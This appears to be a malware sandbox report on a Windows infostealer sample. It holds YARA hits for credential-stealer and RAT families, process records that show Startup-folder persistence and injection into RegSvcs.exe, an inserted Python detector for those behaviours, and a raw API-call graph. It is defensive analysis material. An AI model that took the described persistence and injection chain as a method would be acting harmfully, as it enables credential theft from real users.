                                                                                                                                                • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 0000000F.00000002.2944400846.0000000002D30000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.2944400846.0000000002D30000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000F.00000002.2944400846.0000000002D30000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000F.00000002.2944400846.0000000002D30000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000F.00000002.2944400846.0000000002D30000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 0000000F.00000002.2944400846.0000000002D30000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:false

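The process records above show the chain a detection engineer cares about: WScript.exe executing a .vbs from the user's Startup folder, differences.exe running from a user-writable AppData path, and RegSvcs.exe (the .NET Services Installation Tool) whose recorded command line is differences.exe, the classic signature of a payload injected into a suspended copy of a signed Microsoft binary. The following Python is an added example, not part of the Joe Sandbox report; it parses records in the report's own "Key:value" layout (the sample text is constructed from the fields above, with the same paths) and flags those three behaviours. The function names and rule labels are the example's own.

```python
"""
Added example (not part of the Joe Sandbox report): parse process records in the
report's "Key:value" layout and flag the behaviours visible in the listing.
"""
import re
from pathlib import PureWindowsPath
from typing import Dict, List

# Constructed sample: a subset of the report's process records, same layout as the page.
SAMPLE_REPORT = r"""
Target ID:9
Path:C:\Windows\System32\wscript.exe
Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\differences.vbs"
Has elevated privileges:false

Target ID:10
Path:C:\Users\user\AppData\Local\subpredicate\differences.exe
Commandline:"C:\Users\user\AppData\Local\subpredicate\differences.exe"
Has elevated privileges:false

Target ID:11
Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Commandline:"C:\Users\user\AppData\Local\subpredicate\differences.exe"
Has elevated privileges:false

Target ID:20
Path:C:\Windows\System32\AppVClient.exe
Commandline:C:\Windows\system32\AppVClient.exe
Has elevated privileges:true
"""

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
STARTUP_FRAGMENT = r"\start menu\programs\startup\\"


def parse_records(text: str) -> List[Dict[str, str]]:
    """Split the report into blank-line separated records of 'Key:value' lines.
    partition() on the first ':' keeps drive-letter colons inside the value."""
    records = []
    for chunk in re.split(r"\n\s*\n", text.strip()):
        rec: Dict[str, str] = {}
        for line in chunk.splitlines():
            key, sep, value = line.partition(":")
            if sep:
                rec[key.strip()] = value.strip()
        if rec:
            records.append(rec)
    return records


def split_commandline(cmd: str) -> List[str]:
    """Minimal Windows argv split: quoted tokens or whitespace-delimited bare tokens."""
    return [quoted or bare for quoted, bare in re.findall(r'"([^"]*)"|(\S+)', cmd)]


def check_record(rec: Dict[str, str]) -> List[str]:
    """Return rule labels that fire for one process record (fixed evaluation order)."""
    findings: List[str] = []
    image = rec.get("Path", "")
    argv = split_commandline(rec.get("Commandline", ""))
    if not image or not argv:
        return findings
    image_name = PureWindowsPath(image).name.lower()
    argv0_name = PureWindowsPath(argv[0]).name.lower()

    # 1. The command line is captured at CreateProcess time; if the mapped image
    #    differs from argv[0], the image was swapped out (hollowing / injection).
    if image_name != argv0_name:
        findings.append("image_mismatch")

    # 2. A script host launched with a script that lives in the Startup folder.
    if argv0_name in SCRIPT_HOSTS and any(
        STARTUP_FRAGMENT.rstrip("\\") in arg.lower() for arg in argv[1:]
    ):
        findings.append("startup_script")

    # 3. Executable image located under a user profile's AppData tree.
    low = image.lower()
    if low.startswith("c:\\users\\") and "\\appdata\\" in low:
        findings.append("user_writable_image")
    return findings


def analyse(report_text: str) -> Dict[str, List[str]]:
    """Map Target ID -> findings, omitting records that trigger nothing."""
    result: Dict[str, List[str]] = {}
    for rec in parse_records(report_text):
        hits = check_record(rec)
        if hits:
            result[rec.get("Target ID", "?")] = hits
    return result


if __name__ == "__main__":
    for target, hits in analyse(SAMPLE_REPORT).items():
        print(f"Target {target}: {', '.join(hits)}")
```

The image/command-line mismatch rule is the most portable of the three: it needs only the two fields every EDR and sandbox already records, and it is exactly what distinguishes Target 11 and Target 15 (RegSvcs.exe carrying differences.exe's command line) from the benign AppVClient.exe record.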
                                                                                                                                                Target ID:17
                                                                                                                                                Start time:01:57:49
                                                                                                                                                Start date:02/12/2024
                                                                                                                                                Path:C:\Windows\System32\drivers\AppVStrm.sys
                                                                                                                                                Wow64 process (32bit):
                                                                                                                                                Commandline:
                                                                                                                                                Imagebase:
                                                                                                                                                File size:138'056 bytes
                                                                                                                                                MD5 hash:BDA55F89B69757320BC125FF1CB53B26
                                                                                                                                                Has elevated privileges:
                                                                                                                                                Has administrator privileges:
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:moderate
                                                                                                                                                Has exited:false

                                                                                                                                                Target ID:18
                                                                                                                                                Start time:01:57:49
                                                                                                                                                Start date:02/12/2024
                                                                                                                                                Path:C:\Windows\System32\drivers\AppvVemgr.sys
                                                                                                                                                Wow64 process (32bit):
                                                                                                                                                Commandline:
                                                                                                                                                Imagebase:
                                                                                                                                                File size:174'408 bytes
                                                                                                                                                MD5 hash:E70EE9B57F8D771E2F4D6E6B535F6757
                                                                                                                                                Has elevated privileges:
                                                                                                                                                Has administrator privileges:
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:moderate
                                                                                                                                                Has exited:false

Target ID: 19
Start time: 01:57:49
Start date: 02/12/2024
Path: C:\Windows\System32\drivers\AppvVfs.sys
Wow64 process (32bit):
Commandline:
Imagebase:
File size: 154'952 bytes
MD5 hash: 2CBABD729D5E746B6BD8DC1B4B4DB1E1
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Has exited: false

Target ID: 20
Start time: 01:57:49
Start date: 02/12/2024
Path: C:\Windows\System32\AppVClient.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\AppVClient.exe
Imagebase: 0x140000000
File size: 1'930'240 bytes
MD5 hash: D57EFB62378CB9FE5ABA5C4735D90C00
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 23
Start time: 01:57:51
Start date: 02/12/2024
Path: C:\Windows\System32\FXSSVC.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\fxssvc.exe
Imagebase: 0x140000000
File size: 1'242'624 bytes
MD5 hash: B7AC35C8D5EC032758BDF18DAF940E76
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 24
Start time: 01:57:53
Start date: 02/12/2024
Path: C:\Windows\System32\msdtc.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\msdtc.exe
Imagebase: 0x7ff72bec0000
File size: 1'278'464 bytes
MD5 hash: 6B414CB462A630E3121C6075205CFF23
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 25
Start time: 01:57:56
Start date: 02/12/2024
Path: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe
Imagebase: 0x140000000
File size: 1'235'968 bytes
MD5 hash: 4E2ACC748CE94AC4AC70C66C0815F52C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 26
Start time: 01:57:57
Start date: 02/12/2024
Path: C:\Windows\SysWOW64\perfhost.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWow64\perfhost.exe
Imagebase: 0x400000
File size: 1'150'976 bytes
MD5 hash: 44C283F4BD1BAB81C2FA725DEF4F6B81
Has elevated privileges: true
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: false

Target ID: 27
Start time: 01:57:59
Start date: 02/12/2024
Path: C:\Windows\System32\Locator.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\locator.exe
Imagebase: 0x140000000
File size: 1'141'248 bytes
MD5 hash: DCAC6C83695DE7AFC6FBC22B2463934D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 28
Start time: 01:58:02
Start date: 02/12/2024
Path: C:\Windows\System32\SensorDataService.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\SensorDataService.exe
Imagebase: 0x140000000
File size: 1'846'784 bytes
MD5 hash: 723558C0A185F957C2EBE638F8BBB34E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 29
Start time: 01:58:03
Start date: 02/12/2024
Path: C:\Windows\System32\snmptrap.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\snmptrap.exe
Imagebase: 0x140000000
File size: 1'146'880 bytes
MD5 hash: B2CFA94DAEAB765B33AE6E7BD777C6D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Execution Graph

Execution Coverage: 3.5%
Dynamic/Decrypted Code Coverage: 6.7%
Signature Coverage: 7%
Total number of Nodes: 2000
Total number of Limit Nodes: 68
execution_graph: [raw node/edge listing of the interactive execution graph; the rendered graph (2000 nodes, 68 limit nodes, functions annotated with the Windows APIs they call) is not reproduced here]
108861->108858 108888 4230b5 58 API calls 3 library calls 108861->108888 108865 429c9f __setmode 108864->108865 108866 429cc0 108865->108866 108867 429ca8 108865->108867 108875 429ce1 __setmode 108866->108875 108892 42881d 58 API calls 2 library calls 108866->108892 108889 42a16b 58 API calls 2 library calls 108867->108889 108870 429cad 108890 42a1c8 58 API calls 8 library calls 108870->108890 108871 429cd5 108873 429ceb 108871->108873 108874 429cdc 108871->108874 108878 429c0b __lock 58 API calls 108873->108878 108893 428b28 58 API calls __getptd_noexit 108874->108893 108875->108861 108876 429cb4 108891 42309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 108876->108891 108880 429cf2 108878->108880 108882 429d17 108880->108882 108883 429cff 108880->108883 108895 422d55 108882->108895 108894 429e2b InitializeCriticalSectionAndSpinCount 108883->108894 108886 429d0b 108901 429d33 LeaveCriticalSection _doexit 108886->108901 108889->108870 108890->108876 108892->108871 108893->108875 108894->108886 108896 422d87 _free 108895->108896 108897 422d5e RtlFreeHeap 108895->108897 108896->108886 108897->108896 108898 422d73 108897->108898 108902 428b28 58 API calls __getptd_noexit 108898->108902 108900 422d79 GetLastError 108900->108896 108901->108875 108902->108900 108903->108849 108904->108848 108905->108852 108909 429d75 LeaveCriticalSection 108906->108909 108908 422c87 108908->108839 108909->108908 108911 407667 59 API calls 108910->108911 108912 46cbaf 108911->108912 108913 407667 59 API calls 108912->108913 108914 46cbb8 108913->108914 108915 46cbcc 108914->108915 109247 409b3c 108914->109247 108917 409837 84 API calls 108915->108917 108918 46cbe9 108917->108918 108919 46ccea 108918->108919 108920 46cc0b 108918->108920 108989 46cd1a Mailbox 108918->108989 109051 404ddd 108919->109051 108922 409837 84 API calls 108920->108922 108923 46cc17 108922->108923 108925 408047 59 API calls 108923->108925 108927 46cc23 108925->108927 108926 46cd16 108929 407667 
59 API calls 108926->108929 108926->108989 108932 46cc37 108927->108932 108933 46cc69 108927->108933 108928 404ddd 136 API calls 108928->108926 108930 46cd4b 108929->108930 108931 407667 59 API calls 108930->108931 108934 46cd54 108931->108934 108936 408047 59 API calls 108932->108936 108937 409837 84 API calls 108933->108937 108935 407667 59 API calls 108934->108935 108938 46cd5d 108935->108938 108939 46cc47 108936->108939 108940 46cc76 108937->108940 108942 407667 59 API calls 108938->108942 109251 407cab 108939->109251 108941 408047 59 API calls 108940->108941 108944 46cc82 108941->108944 108945 46cd66 108942->108945 109258 464a31 GetFileAttributesW 108944->109258 108948 409837 84 API calls 108945->108948 108951 46cd73 108948->108951 108949 409837 84 API calls 108952 46cc5d 108949->108952 108950 46cc8b 108953 46cc9e 108950->108953 108956 4079f2 59 API calls 108950->108956 109075 40459b 108951->109075 108955 407b2e 59 API calls 108952->108955 108958 409837 84 API calls 108953->108958 108964 46cca4 108953->108964 108955->108933 108956->108953 108957 46cd8e 109126 4079f2 108957->109126 108960 46cccb 108958->108960 109259 4637ef 75 API calls Mailbox 108960->109259 108963 46cdd1 108965 408047 59 API calls 108963->108965 108964->108989 108967 46cddf 108965->108967 108966 4079f2 59 API calls 108968 46cdae 108966->108968 109129 407b2e 108967->109129 108968->108963 109260 407bcc 108968->109260 108972 407b2e 59 API calls 108975 46cdfb 108972->108975 108973 46cdc3 108974 407bcc 59 API calls 108973->108974 108974->108963 108976 407b2e 59 API calls 108975->108976 108977 46ce09 108976->108977 108978 409837 84 API calls 108977->108978 108979 46ce15 108978->108979 109138 464071 108979->109138 108981 46ce26 108982 463c37 3 API calls 108981->108982 108983 46ce30 108982->108983 108984 409837 84 API calls 108983->108984 108988 46ce61 108983->108988 108985 46ce4e 108984->108985 109192 469155 108985->109192 108987 404e4a 84 API calls 108987->108989 108988->108987 108989->108766 
108991 404e54 108990->108991 108993 404e5b 108990->108993 108992 4253a6 __fcloseall 83 API calls 108991->108992 108992->108993 108994 404e6a 108993->108994 108995 404e7b FreeLibrary 108993->108995 108994->108766 108995->108994 110010 46445a GetFileAttributesW 108996->110010 109000 409837 84 API calls 108999->109000 109001 474494 109000->109001 110014 406240 109001->110014 109003 4744a4 109004 409ea0 331 API calls 109003->109004 109005 4744c9 109003->109005 109004->109005 109007 4744cd 109005->109007 110039 409a98 59 API calls Mailbox 109005->110039 109007->108766 109008->108762 109009->108766 109011 47bc96 109010->109011 109012 47bcb0 109010->109012 110059 469e4a 89 API calls 4 library calls 109011->110059 110060 47a213 59 API calls Mailbox 109012->110060 109015 47bcbb 109016 409ea0 330 API calls 109015->109016 109017 47bd1c 109016->109017 109018 47bdae 109017->109018 109022 47bd5d 109017->109022 109043 47bca8 Mailbox 109017->109043 109019 47be04 109018->109019 109020 47bdb4 109018->109020 109021 409837 84 API calls 109019->109021 109019->109043 110062 46791a 59 API calls 109020->110062 109023 47be16 109021->109023 110061 4672df 59 API calls Mailbox 109022->110061 109026 407e4f 59 API calls 109023->109026 109030 47be3a CharUpperBuffW 109026->109030 109027 47bdd7 110063 405d41 59 API calls Mailbox 109027->110063 109029 47bd8d 109032 40f460 330 API calls 109029->109032 109033 47be54 109030->109033 109031 47bddf Mailbox 109036 40fce0 330 API calls 109031->109036 109032->109043 109034 47bea7 109033->109034 109035 47be5b 109033->109035 109037 409837 84 API calls 109034->109037 110064 4672df 59 API calls Mailbox 109035->110064 109036->109043 109038 47beaf 109037->109038 110065 409e5d 60 API calls 109038->110065 109041 47be89 109042 40f460 330 API calls 109041->109042 109042->109043 109043->108760 109044 47beb9 109044->109043 109045 409837 84 API calls 109044->109045 109046 47bed4 109045->109046 110066 405d41 59 API calls Mailbox 109046->110066 109048 47bee4 109049 40fce0 
330 API calls 109048->109049 109049->109043 109050->108764 109269 404bb5 109051->109269 109056 43d8e6 109058 404e4a 84 API calls 109056->109058 109057 404e08 LoadLibraryExW 109279 404b6a 109057->109279 109060 43d8ed 109058->109060 109063 404b6a 3 API calls 109060->109063 109065 43d8f5 109063->109065 109064 404e2f 109064->109065 109066 404e3b 109064->109066 109305 404f0b 109065->109305 109067 404e4a 84 API calls 109066->109067 109069 404e40 109067->109069 109069->108926 109069->108928 109072 43d91c 109313 404ec7 109072->109313 109076 407667 59 API calls 109075->109076 109077 4045b1 109076->109077 109078 407667 59 API calls 109077->109078 109079 4045b9 109078->109079 109080 407667 59 API calls 109079->109080 109081 4045c1 109080->109081 109082 407667 59 API calls 109081->109082 109083 4045c9 109082->109083 109084 43d4d2 109083->109084 109085 4045fd 109083->109085 109086 408047 59 API calls 109084->109086 109087 40784b 59 API calls 109085->109087 109088 43d4db 109086->109088 109089 40460b 109087->109089 109617 407d8c 109088->109617 109613 407d2c 109089->109613 109092 404615 109093 404640 109092->109093 109094 40784b 59 API calls 109092->109094 109096 43d4fb 109093->109096 109097 40465f 109093->109097 109113 404680 109093->109113 109098 404636 109094->109098 109101 43d5cb 109096->109101 109108 43d5b4 109096->109108 109120 43d532 109096->109120 109099 4079f2 59 API calls 109097->109099 109102 407d2c 59 API calls 109098->109102 109104 404669 109099->109104 109100 404691 109105 4046a3 109100->109105 109106 408047 59 API calls 109100->109106 109103 407bcc 59 API calls 109101->109103 109102->109093 109121 43d588 109103->109121 109111 40784b 59 API calls 109104->109111 109104->109113 109107 408047 59 API calls 109105->109107 109109 4046b3 109105->109109 109106->109105 109107->109109 109108->109101 109116 43d59f 109108->109116 109110 4046ba 109109->109110 109112 408047 59 API calls 109109->109112 109114 408047 59 API calls 109110->109114 109123 4046c1 Mailbox 109110->109123 
109111->109113 109112->109110 109600 40784b 109113->109600 109114->109123 109115 4079f2 59 API calls 109115->109121 109119 407bcc 59 API calls 109116->109119 109117 43d590 109118 407bcc 59 API calls 109117->109118 109118->109121 109119->109121 109120->109117 109124 43d57b 109120->109124 109121->109113 109121->109115 109621 407924 59 API calls 2 library calls 109121->109621 109123->108957 109125 407bcc 59 API calls 109124->109125 109125->109121 109127 407e4f 59 API calls 109126->109127 109128 4079fd 109127->109128 109128->108963 109128->108966 109130 407b40 109129->109130 109131 43ec6b 109129->109131 109629 407a51 109130->109629 109635 457bdb 59 API calls _memmove 109131->109635 109134 407b4c 109134->108972 109135 43ec75 109136 408047 59 API calls 109135->109136 109137 43ec7d Mailbox 109136->109137 109139 46408d 109138->109139 109140 464092 109139->109140 109141 4640a0 109139->109141 109143 408047 59 API calls 109140->109143 109142 407667 59 API calls 109141->109142 109144 4640a8 109142->109144 109191 46409b Mailbox 109143->109191 109145 407667 59 API calls 109144->109145 109146 4640b0 109145->109146 109147 407667 59 API calls 109146->109147 109148 4640bb 109147->109148 109149 407667 59 API calls 109148->109149 109150 4640c3 109149->109150 109151 407667 59 API calls 109150->109151 109152 4640cb 109151->109152 109153 407667 59 API calls 109152->109153 109154 4640d3 109153->109154 109155 407667 59 API calls 109154->109155 109156 4640db 109155->109156 109157 407667 59 API calls 109156->109157 109158 4640e3 109157->109158 109159 40459b 59 API calls 109158->109159 109160 4640fa 109159->109160 109191->108981 109193 469162 __ftell_nolock 109192->109193 109194 420db6 Mailbox 59 API calls 109193->109194 109195 4691bf 109194->109195 109196 40522e 59 API calls 109195->109196 109197 4691c9 109196->109197 109198 468f5f GetSystemTimeAsFileTime 109197->109198 109199 4691d4 109198->109199 109200 404ee5 85 API calls 109199->109200 109201 4691e7 _wcscmp 109200->109201 109202 46920b 
109201->109202 109203 4692b8 109201->109203 109668 469734 109202->109668 109205 469734 96 API calls 109203->109205 109248 409b52 109247->109248 109249 409b4d 109247->109249 109248->108915 109249->109248 110004 42358a 59 API calls 109249->110004 109252 43ed4a 109251->109252 109253 407cbf 109251->109253 109254 408029 59 API calls 109252->109254 110005 407c50 109253->110005 109257 43ed55 __wsetenvp _memmove 109254->109257 109256 407cca 109256->108949 109258->108950 109259->108964 109261 407c45 109260->109261 109262 407bd8 __wsetenvp 109260->109262 109263 407d2c 59 API calls 109261->109263 109264 407c13 109262->109264 109265 407bee 109262->109265 109268 407bf6 _memmove 109263->109268 109267 408029 59 API calls 109264->109267 109266 407f27 59 API calls 109265->109266 109266->109268 109267->109268 109268->108973 109318 404c03 109269->109318 109272 404c03 2 API calls 109275 404bdc 109272->109275 109273 404bf5 109276 42525b 109273->109276 109274 404bec FreeLibrary 109274->109273 109275->109273 109275->109274 109322 425270 109276->109322 109278 404dfc 109278->109056 109278->109057 109403 404c36 109279->109403 109282 404b8f 109284 404ba1 FreeLibrary 109282->109284 109285 404baa 109282->109285 109283 404c36 2 API calls 109283->109282 109284->109285 109286 404c70 109285->109286 109287 420db6 Mailbox 59 API calls 109286->109287 109288 404c85 109287->109288 109407 40522e 109288->109407 109290 404c91 _memmove 109291 404ccc 109290->109291 109292 404dc1 109290->109292 109293 404d89 109290->109293 109294 404ec7 69 API calls 109291->109294 109421 46991b 95 API calls 109292->109421 109410 404e89 CreateStreamOnHGlobal 109293->109410 109302 404cd5 109294->109302 109297 404f0b 74 API calls 109297->109302 109298 404d69 109298->109064 109300 43d8a7 109301 404ee5 85 API calls 109300->109301 109303 43d8bb 109301->109303 109302->109297 109302->109298 109302->109300 109416 404ee5 109302->109416 109304 404f0b 74 API calls 109303->109304 109304->109298 109306 404f1d 109305->109306 109307 43d9cd 
109305->109307 109445 4255e2 109306->109445 109310 469109 109577 468f5f 109310->109577 109312 46911f 109312->109072 109314 43d990 109313->109314 109315 404ed6 109313->109315 109582 425c60 109315->109582 109317 404ede 109319 404bd0 109318->109319 109320 404c0c LoadLibraryA 109318->109320 109319->109272 109319->109275 109320->109319 109321 404c1d GetProcAddress 109320->109321 109321->109319 109323 42527c __setmode 109322->109323 109324 42528f 109323->109324 109326 4252c0 109323->109326 109371 428b28 58 API calls __getptd_noexit 109324->109371 109341 4304e8 109326->109341 109327 425294 109372 428db6 9 API calls __setmode 109327->109372 109330 4252c5 109331 4252db 109330->109331 109332 4252ce 109330->109332 109334 425305 109331->109334 109335 4252e5 109331->109335 109373 428b28 58 API calls __getptd_noexit 109332->109373 109356 430607 109334->109356 109374 428b28 58 API calls __getptd_noexit 109335->109374 109336 42529f @_EH4_CallFilterFunc@8 __setmode 109336->109278 109342 4304f4 __setmode 109341->109342 109343 429c0b __lock 58 API calls 109342->109343 109354 430502 109343->109354 109344 430576 109376 4305fe 109344->109376 109345 43057d 109381 42881d 58 API calls 2 library calls 109345->109381 109348 430584 109348->109344 109382 429e2b InitializeCriticalSectionAndSpinCount 109348->109382 109349 4305f3 __setmode 109349->109330 109351 429c93 __mtinitlocknum 58 API calls 109351->109354 109353 4305aa EnterCriticalSection 109353->109344 109354->109344 109354->109345 109354->109351 109379 426c50 59 API calls __lock 109354->109379 109380 426cba LeaveCriticalSection LeaveCriticalSection _doexit 109354->109380 109364 430627 __wopenfile 109356->109364 109357 430641 109387 428b28 58 API calls __getptd_noexit 109357->109387 109359 430646 109388 428db6 9 API calls __setmode 109359->109388 109361 425310 109375 425332 LeaveCriticalSection LeaveCriticalSection __wfsopen 109361->109375 109362 43085f 109384 4385a1 109362->109384 109364->109357 109370 4307fc 109364->109370 109389 4237cb 
60 API calls 2 library calls 109364->109389 109366 4307f5 109366->109370 109390 4237cb 60 API calls 2 library calls 109366->109390 109368 430814 109368->109370 109391 4237cb 60 API calls 2 library calls 109368->109391 109370->109357 109370->109362 109371->109327 109372->109336 109373->109336 109374->109336 109375->109336 109383 429d75 LeaveCriticalSection 109376->109383 109378 430605 109378->109349 109379->109354 109380->109354 109381->109348 109382->109353 109383->109378 109392 437d85 109384->109392 109386 4385ba 109386->109361 109387->109359 109388->109361 109389->109366 109390->109368 109391->109370 109395 437d91 __setmode 109392->109395 109393 437da7 109394 428b28 __setmode 58 API calls 109393->109394 109396 437dac 109394->109396 109395->109393 109397 437ddd 109395->109397 109398 428db6 __setmode 9 API calls 109396->109398 109399 437e4e __wsopen_nolock 109 API calls 109397->109399 109402 437db6 __setmode 109398->109402 109400 437df9 109399->109400 109401 437e22 __wsopen_helper LeaveCriticalSection 109400->109401 109401->109402 109402->109386 109404 404b83 109403->109404 109405 404c3f LoadLibraryA 109403->109405 109404->109282 109404->109283 109405->109404 109406 404c50 GetProcAddress 109405->109406 109406->109404 109408 420db6 Mailbox 59 API calls 109407->109408 109409 405240 109408->109409 109409->109290 109411 404ea3 FindResourceExW 109410->109411 109415 404ec0 109410->109415 109412 43d933 LoadResource 109411->109412 109411->109415 109413 43d948 SizeofResource 109412->109413 109412->109415 109414 43d95c LockResource 109413->109414 109413->109415 109414->109415 109415->109291 109417 404ef4 109416->109417 109418 43d9ab 109416->109418 109422 42584d 109417->109422 109420 404f02 109420->109302 109421->109291 109423 425859 __setmode 109422->109423 109424 42586b 109423->109424 109426 425891 109423->109426 109435 428b28 58 API calls __getptd_noexit 109424->109435 109437 426c11 109426->109437 109427 425870 109436 428db6 9 API calls __setmode 109427->109436 109432 
4258a6 109444 4258c8 LeaveCriticalSection LeaveCriticalSection __wfsopen 109432->109444 109434 42587b __setmode 109434->109420 109435->109427 109436->109434 109438 426c43 EnterCriticalSection 109437->109438 109439 426c21 109437->109439 109441 425897 109438->109441 109439->109438 109440 426c29 109439->109440 109442 429c0b __lock 58 API calls 109440->109442 109443 4257be 83 API calls 5 library calls 109441->109443 109442->109441 109443->109432 109444->109434 109448 4255fd 109445->109448 109447 404f2e 109447->109310 109449 425609 __setmode 109448->109449 109450 42564c 109449->109450 109451 425644 __setmode 109449->109451 109456 42561f _memset 109449->109456 109452 426c11 __lock_file 59 API calls 109450->109452 109451->109447 109453 425652 109452->109453 109461 42541d 109453->109461 109475 428b28 58 API calls __getptd_noexit 109456->109475 109457 425639 109476 428db6 9 API calls __setmode 109457->109476 109465 425438 _memset 109461->109465 109467 425453 109461->109467 109462 425443 109573 428b28 58 API calls __getptd_noexit 109462->109573 109464 425448 109574 428db6 9 API calls __setmode 109464->109574 109465->109462 109465->109467 109472 425493 109465->109472 109477 425686 LeaveCriticalSection LeaveCriticalSection __wfsopen 109467->109477 109469 4255a4 _memset 109576 428b28 58 API calls __getptd_noexit 109469->109576 109472->109467 109472->109469 109478 4246e6 109472->109478 109485 430e5b 109472->109485 109553 430ba7 109472->109553 109575 430cc8 58 API calls 3 library calls 109472->109575 109475->109457 109476->109451 109477->109451 109479 4246f0 109478->109479 109480 424705 109478->109480 109481 428b28 __setmode 58 API calls 109479->109481 109480->109472 109482 4246f5 109481->109482 109483 428db6 __setmode 9 API calls 109482->109483 109484 424700 109483->109484 109484->109472 109486 430e93 109485->109486 109487 430e7c 109485->109487 109489 4315cb 109486->109489 109493 430ecd 109486->109493 109488 428af4 __free_osfhnd 58 API calls 109487->109488 109490 430e81 
109488->109490 109491 428af4 __free_osfhnd 58 API calls 109489->109491 109492 428b28 __setmode 58 API calls 109490->109492 109494 4315d0 109491->109494 109533 430e88 109492->109533 109495 430ed5 109493->109495 109502 430eec 109493->109502 109496 428b28 __setmode 58 API calls 109494->109496 109498 428af4 __free_osfhnd 58 API calls 109495->109498 109497 430ee1 109496->109497 109500 428db6 __setmode 9 API calls 109497->109500 109499 430eda 109498->109499 109505 428b28 __setmode 58 API calls 109499->109505 109500->109533 109501 430f01 109503 428af4 __free_osfhnd 58 API calls 109501->109503 109502->109501 109504 430f1b 109502->109504 109506 430f39 109502->109506 109502->109533 109503->109499 109504->109501 109510 430f26 109504->109510 109505->109497 109507 42881d __malloc_crt 58 API calls 109506->109507 109508 430f49 109507->109508 109511 430f51 109508->109511 109512 430f6c 109508->109512 109509 435c6b __flsbuf 58 API calls 109513 43103a 109509->109513 109510->109509 109514 428b28 __setmode 58 API calls 109511->109514 109516 4318c1 __lseeki64_nolock 60 API calls 109512->109516 109515 4310b3 ReadFile 109513->109515 109520 431050 GetConsoleMode 109513->109520 109517 430f56 109514->109517 109518 431593 GetLastError 109515->109518 109519 4310d5 109515->109519 109516->109510 109521 428af4 __free_osfhnd 58 API calls 109517->109521 109522 4315a0 109518->109522 109523 431093 109518->109523 109519->109518 109527 4310a5 109519->109527 109524 4310b0 109520->109524 109525 431064 109520->109525 109521->109533 109526 428b28 __setmode 58 API calls 109522->109526 109531 428b07 __dosmaperr 58 API calls 109523->109531 109535 431099 109523->109535 109524->109515 109525->109524 109528 43106a ReadConsoleW 109525->109528 109529 4315a5 109526->109529 109527->109535 109537 43110a 109527->109537 109546 431377 109527->109546 109528->109527 109530 43108d GetLastError 109528->109530 109532 428af4 __free_osfhnd 58 API calls 109529->109532 109530->109523 109531->109535 109532->109535 109533->109472 
109534 422d55 _free 58 API calls 109534->109533 109535->109533 109535->109534 109536 431264 MultiByteToWideChar 109536->109530 109536->109535 109538 431176 ReadFile 109537->109538 109544 4311f7 109537->109544 109541 431197 GetLastError 109538->109541 109548 4311a1 109538->109548 109540 43147d ReadFile 109547 4314a0 GetLastError 109540->109547 109552 4314ae 109540->109552 109541->109548 109542 4312b4 109542->109536 109549 4318c1 __lseeki64_nolock 60 API calls 109542->109549 109543 4312a4 109545 428b28 __setmode 58 API calls 109543->109545 109544->109535 109544->109536 109544->109542 109544->109543 109545->109535 109546->109535 109546->109540 109547->109552 109548->109537 109550 4318c1 __lseeki64_nolock 60 API calls 109548->109550 109549->109536 109550->109548 109551 4318c1 __lseeki64_nolock 60 API calls 109551->109552 109552->109546 109552->109551 109554 430bb2 109553->109554 109555 430bc7 109553->109555 109556 428b28 __setmode 58 API calls 109554->109556 109559 430bfc 109555->109559 109560 435fe4 __getbuf 58 API calls 109555->109560 109564 430bc2 109555->109564 109557 430bb7 109556->109557 109558 428db6 __setmode 9 API calls 109557->109558 109558->109564 109561 4246e6 __flsbuf 58 API calls 109559->109561 109560->109559 109562 430c10 109561->109562 109563 430d47 __read 72 API calls 109562->109563 109565 430c17 109563->109565 109564->109472 109565->109564 109566 4246e6 __flsbuf 58 API calls 109565->109566 109567 430c3a 109566->109567 109567->109564 109568 4246e6 __flsbuf 58 API calls 109567->109568 109569 430c46 109568->109569 109569->109564 109570 4246e6 __flsbuf 58 API calls 109569->109570 109571 430c53 109570->109571 109572 4246e6 __flsbuf 58 API calls 109571->109572 109572->109564 